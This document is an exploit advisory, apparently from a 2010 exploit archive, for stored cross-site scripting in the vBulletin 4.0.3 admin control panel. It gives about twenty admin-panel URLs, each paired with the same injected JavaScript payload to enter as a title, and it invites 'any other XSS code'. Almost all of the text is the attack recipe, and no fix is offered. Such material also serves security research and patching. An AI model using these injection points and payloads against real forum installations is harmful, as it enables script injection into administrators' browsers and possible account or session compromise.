###########################################################################
# #
# -:: vBulletin [4.0.3] adminCP Cross-Site Scripting :: - #
# #
# Exploit Title: vBulletin adminCP Cross-Site Scripting #
# Date: 2010 #
# Author:[ Ashiyane Digital Security Team ] [Cair3x] #
# Software Link: http://www.vBulletin.com #
# Version: 4.0.3 #
# Tested on: vBulletin 4.0.3 #
# Exploited : [ scriptplazza ] #
###########################################################################
-:: Generic Smilies Manager => Add New Generic Smilies ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/image.php?do=add&table=smilie )
Add a new title . use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Avatars Manager => Add New Avatars ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/image.php?do=add&table=icon )
Add a new title . use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: User Titles Manager => Add New User Titles ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/usertitle.php?do=add )
Add a new title . use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: User Reputations Manager => Add New User Reputations ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/adminreputation.php?do=add )
Add a new title . use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: User Reputations Manager => Add New User Reputations ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/adminreputation.php?do=add )
Add a new title . use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: User Profile Fields Manager => Add New User Profile Fields ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/profilefield.php?do=add )
Add a new title . use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Usergroups Manager => Add New Usergroups ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/usergroup.php?do=add )
Add a new title . use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Forum Announcements => Add New Announcements ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/announcement.php?do=add )
Go To ( http://127.0.0.1/vb/amodcp/announcement.php?do=add )
Add a new title . use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Forum Notices => Add New Notices ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/notice.php?do=add )
Add a new title . use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Forum Advertising => Add New Advertising ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/ad.php?do=add )
Add a new title . use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Forum Manager => Add New Forum Manager ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/forum.php?do=add )
Add a new title . use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Calendar Manager => Add New Calendar ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/admincalendar.php?do=add )
Add a new title . use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Usergroup Manager => Add New Usergroup ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/usergroup.php?do=add )
Add a new title . use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
.
-:: User Rank Manager => Rank Type ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/ranks.php?do=add )
use the following code as (OR you may enter text HTML is allowed) Text .
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: BB Code Manager => Add New BB Code ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/bbcode.php?do=add )
Complete All Required Fields And Enter Javascript Code in Title :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
.
-:: Scheduled Task Manager => Add New Scheduled Task ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/cronadmin.php?do=edit )
Complete All Required Fields And Enter Javascript Code in Title :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: FAQ Manager => Add New FAQ Item ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/faq.php?do=add )
Add a new title . use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
.
-:: Style Manager => Add New Style ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/template.php?do=addstyle )
Add a new title . use the following code as title name :
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code